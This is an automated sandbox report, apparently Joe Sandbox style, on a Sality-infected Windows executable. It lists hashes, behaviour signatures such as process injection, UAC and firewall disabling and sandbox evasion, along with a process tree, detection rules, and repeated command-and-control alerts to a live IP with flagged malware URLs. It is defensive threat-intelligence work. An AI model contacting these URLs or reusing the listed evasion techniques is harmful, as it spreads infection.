
Windows Analysis Report
RHxJqGoGFB.exe

Overview

General Information

Sample name: RHxJqGoGFB.exe
renamed because original name is a hash value
Original sample name: 2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd.exe
Analysis ID: 1563008
MD5: 4f7fa0b66a6e153089ab00199b04356b
SHA1: 7c2a6d1a21501502e2186ca493a1069909bba703
SHA256: 2e6402a52ca73f3390ee4f703a1f509a3f2e05220034b1b36c013a083a1222bd
Tags: 86-104-74-51, exe, user-JAMESWT_MHT
Infos:

Detection

Sality
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Sality
AI detected suspicious sample
Allocates memory in foreign processes
Changes security center settings (notifications, updates, antivirus, firewall)
Contains functionality to inject threads in other processes
Creates a thread in another existing process (thread injection)
Creates autorun.inf (USB autostart)
Deletes keys which are related to windows safe boot (disables safe mode boot)
Disables UAC (registry)
Disables user account control notifications
Drops PE files with a suspicious file extension
Found direct / indirect Syscall (likely to bypass EDR)
Found stalling execution ending in API Sleep call
Injects code into the Windows Explorer (explorer.exe)
Machine Learning detection for dropped file
Machine Learning detection for sample
May modify the system service descriptor table (often done to hook functions)
Modifies the windows firewall
Modifies the windows firewall notifications settings
PE file has a writeable .text section
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Writes to foreign memory regions
Abnormal high CPU Usage
Checks for available system drives (often done to infect USB drives)
Connects to several IPs in different countries
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
May infect USB drives
May sleep (evasive loops) to hinder dynamic analysis
Modifies existing windows services
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RHxJqGoGFB.exe (PID: 7300 cmdline: "C:\Users\user\Desktop\RHxJqGoGFB.exe" MD5: 4F7FA0B66A6E153089AB00199B04356B)
    • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • fontdrvhost.exe (PID: 776 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • fontdrvhost.exe (PID: 784 cmdline: "fontdrvhost.exe" MD5: BBCB897697B3442657C7D6E3EDDBD25F)
    • ShellExperienceHost.exe (PID: 7460 cmdline: "C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe" -ServerName:App.AppXtk181tbxbce2qsex02s8tw7hfxa9xb3t.mca MD5: 9B8DE9D4EDF68EEF2C1E490ABC291567)
    • dwm.exe (PID: 988 cmdline: "dwm.exe" MD5: 5C27608411832C5B39BA04E33D53536C)
    • RuntimeBroker.exe (PID: 7732 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • sihost.exe (PID: 3420 cmdline: sihost.exe MD5: A21E7719D73D0322E2E7D61802CB8F80)
    • svchost.exe (PID: 3456 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • svchost.exe (PID: 3528 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s WpnUserService MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • ctfmon.exe (PID: 3832 cmdline: "ctfmon.exe" MD5: B625C18E177D5BEB5A6F6432CCF46FB3)
    • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
    • svchost.exe (PID: 4196 cmdline: C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • StartMenuExperienceHost.exe (PID: 4660 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca MD5: 5CDDF06A40E89358807A2B9506F064D9)
    • RuntimeBroker.exe (PID: 4872 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SearchApp.exe (PID: 4984 cmdline: "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca MD5: 5E1C9231F1F1DCBA168CA9F3227D9168)
    • RuntimeBroker.exe (PID: 5092 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • smartscreen.exe (PID: 5584 cmdline: C:\Windows\System32\smartscreen.exe -Embedding MD5: 02FB7069B8D8426DC72C9D8A495AF55A)
    • TextInputHost.exe (PID: 3788 cmdline: "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXjd5de1g66v206tj52m9d0dtpppx4cgpn.mca MD5: F050189D49E17D0D340DE52E9E5B711F)
    • RuntimeBroker.exe (PID: 5116 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 1532 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • ApplicationFrameHost.exe (PID: 5736 cmdline: C:\Windows\system32\ApplicationFrameHost.exe -Embedding MD5: D58A8A987A8DAFAD9DC32A548CC061E7)
    • WinStore.App.exe (PID: 2524 cmdline: "C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\WinStore.App.exe" -ServerName:App.AppXc75wvwned5vhz4xyxxecvgdjhdkgsdza.mca MD5: 6C44453CD661FC2DB18E4C09C4940399)
    • RuntimeBroker.exe (PID: 1760 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • SystemSettings.exe (PID: 6060 cmdline: "C:\Windows\ImmersiveControlPanel\SystemSettings.exe" -ServerName:microsoft.windows.immersivecontrolpanel MD5: 3CD3CD85226FCF576DFE9B70B6DA2630)
    • UserOOBEBroker.exe (PID: 3924 cmdline: C:\Windows\System32\oobe\UserOOBEBroker.exe -Embedding MD5: BCE744909EB87F293A85830D02B3D6EB)
    • svchost.exe (PID: 4600 cmdline: C:\Windows\system32\svchost.exe -k UnistackSvcGroup MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
    • dllhost.exe (PID: 2288 cmdline: C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683} MD5: 08EB78E5BE019DF044C26B14703BD1FA)
    • conhost.exe (PID: 3688 cmdline: C:\Windows\system32\conhost.exe 0x4 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RuntimeBroker.exe (PID: 3548 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • RuntimeBroker.exe (PID: 5000 cmdline: C:\Windows\System32\RuntimeBroker.exe -Embedding MD5: BA4CFE6461AFA1004C52F19C8F2169DC)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 3632 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5728 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5100 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5296 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 2336 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 5984 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 2564 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
    • kgTxkwCMEtRJHvgbWwUB.exe (PID: 3604 cmdline: "C:\Program Files (x86)\bhLpQOYLVRtOCiphtvfkMjMamkHSiOTVodwFadhXQze\kgTxkwCMEtRJHvgbWwUB.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
  • cleanup
Name: Sality

Description: F-Secure states that the Sality virus family has been circulating in the wild as early as 2003. Over the years, the malware has been developed and improved with the addition of new features, such as rootkit or backdoor functionality, and so on, keeping it an active and relevant threat despite the relative age of the malware. Modern Sality variants also have the ability to communicate over a peer-to-peer (P2P) network, allowing an attacker to control a botnet of Sality-infected machines. The combined resources of the Sality botnet may also be used by its controller(s) to perform other malicious actions, such as attacking routers.

Infection: Sality viruses typically infect executable files on local, shared and removable drives. In earlier variants, the Sality virus simply added its own malicious code to the end of the infected (or host) file, a technique known as prepending. The viral code that Sality inserts is polymorphic, a form of complex code that is intended to make analysis more difficult. Earlier Sality variants were regarded as technically sophisticated in that they use an Entry Point Obscuration (EPO) technique to hide their presence on the system. This technique means that the virus inserts a command somewhere in the middle of an infected file's code, so that when the system is reading the file to execute it and comes to the command, it forces the system to 'jump' to the malware's code and execute that instead. This technique was used to make discovery and disinfection of the malicious code harder.

Payload: Once installed on the computer system, Sality viruses usually also execute a malicious payload. The specific actions performed depend on the specific variant in question, but generally Sality viruses will attempt to terminate processes, particularly those related to security programs. The virus may also attempt to open connections to remote sites, download and run additional malicious files, and steal data from the infected machine.

Attribution:
  • Salty Spider

Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.sality
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: RHxJqGoGFB.exe PID: 7300 | JoeSecurity_Sality | Yara detected Sality | Joe Security |

Source | Rule | Description | Author | Strings
0.2.RHxJqGoGFB.exe.8f0cc4.9.raw.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x185c:$s1: Simple Poly Engine v
0.2.RHxJqGoGFB.exe.8c0d78.6.unpack | JoeSecurity_Sality | Yara detected Sality | Joe Security |
0.2.RHxJqGoGFB.exe.8c0d78.6.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x317a8:$s1: Simple Poly Engine v
0.2.RHxJqGoGFB.exe.8d0000.8.unpack | JoeSecurity_Sality | Yara detected Sality | Joe Security |
0.2.RHxJqGoGFB.exe.8d0000.8.unpack | INDICATOR_EXE_Packed_SimplePolyEngine | Detects executables packed with Sality Polymorphic Code Generator or Simple Poly Engine or Sality | ditekSHen | 0x22520:$s1: Simple Poly Engine v

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RHxJqGoGFB.exe", ParentImage: C:\Users\user\Desktop\RHxJqGoGFB.exe, ParentProcessId: 7300, ParentProcessName: RHxJqGoGFB.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe
Source: Registry Key set | Author: frack113 | Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\RHxJqGoGFB.exe, ProcessId: 7300, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\GlobalUserOffline
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\RHxJqGoGFB.exe", ParentImage: C:\Users\user\Desktop\RHxJqGoGFB.exe, ParentProcessId: 7300, ParentProcessName: RHxJqGoGFB.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc, ProcessId: 3456, ProcessName: svchost.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T11:42:11.899329+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49732 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:16.743004+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49735 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:21.684084+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49737 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:26.565787+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49742 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:31.368788+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49745 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:36.200224+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49746 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:41.050525+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49747 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:45.964254+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49748 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:50.728667+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49749 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:55.543033+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49750 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:00.519992+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49752 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:05.291200+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49759 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:10.085351+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49774 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:14.964564+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49786 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:19.753858+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49797 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:24.934464+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49808 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:30.379426+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49819 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:35.273608+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49834 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:40.463057+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49846 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:45.715241+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49857 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:50.655396+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49868 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:55.459153+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49880 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:00.276318+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49891 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:05.354825+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49902 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:11.156348+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49914 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:16.040513+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49925 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:20.885968+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49940 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:25.781545+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49951 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:30.615302+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49962 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:35.444529+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49973 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:40.366730+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49984 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:45.244056+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49995 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:50.147625+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50006 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:55.298067+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50019 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:00.538110+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50032 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:05.399094+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50042 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:10.307722+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50043 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:15.407489+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50044 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:20.712933+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50045 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:25.593889+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50046 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:30.698514+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50047 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:35.698392+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50048 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:41.155369+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50049 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:46.228245+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50050 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:51.090228+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50051 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:56.062306+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50052 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:00.949414+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50053 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:05.871611+0100 | 2018340 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 50054 | 46.105.103.219 | 80 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-11-26T11:42:11.899329+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49732 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:16.743004+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49735 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:21.684084+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49737 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:26.565787+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49742 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:31.368788+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49745 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:36.200224+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49746 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:41.050525+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49747 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:45.964254+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49748 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:50.728667+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49749 | 46.105.103.219 | 80 | TCP
2024-11-26T11:42:55.543033+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49750 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:00.519992+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49752 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:05.291200+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49759 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:10.085351+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49774 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:14.964564+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49786 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:19.753858+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49797 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:24.934464+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49808 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:30.379426+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49819 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:35.273608+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49834 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:40.463057+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49846 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:45.715241+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49857 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:50.655396+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49868 | 46.105.103.219 | 80 | TCP
2024-11-26T11:43:55.459153+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49880 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:00.276318+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49891 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:05.354825+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49902 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:11.156348+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49914 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:16.040513+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49925 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:20.885968+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49940 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:25.781545+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49951 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:30.615302+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49962 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:35.444529+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49973 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:40.366730+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49984 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:45.244056+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 49995 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:50.147625+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50006 | 46.105.103.219 | 80 | TCP
2024-11-26T11:44:55.298067+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50019 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:00.538110+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50032 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:05.399094+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50042 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:10.307722+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50043 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:15.407489+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50044 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:20.712933+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50045 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:25.593889+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50046 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:30.698514+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50047 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:35.698392+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50048 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:41.155369+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50049 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:46.228245+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50050 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:51.090228+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50051 | 46.105.103.219 | 80 | TCP
2024-11-26T11:45:56.062306+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50052 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:00.949414+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50053 | 46.105.103.219 | 80 | TCP
2024-11-26T11:46:05.871611+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.4 | 50054 | 46.105.103.219 | 80 | TCP


AV Detection

Source: RHxJqGoGFB.exe | Avira: detected
Source: http://46.105.103.219/sobakavolos.gif?53792577=-1494070546 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?10c254e3=1687027026 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?16620ca3=1502098060 | Avira URL Cloud: Label: malware
Source: http://46.105.103.219/sobakavolos.gif?1a7967a=83280750 | Avira URL Cloud: Label: malware
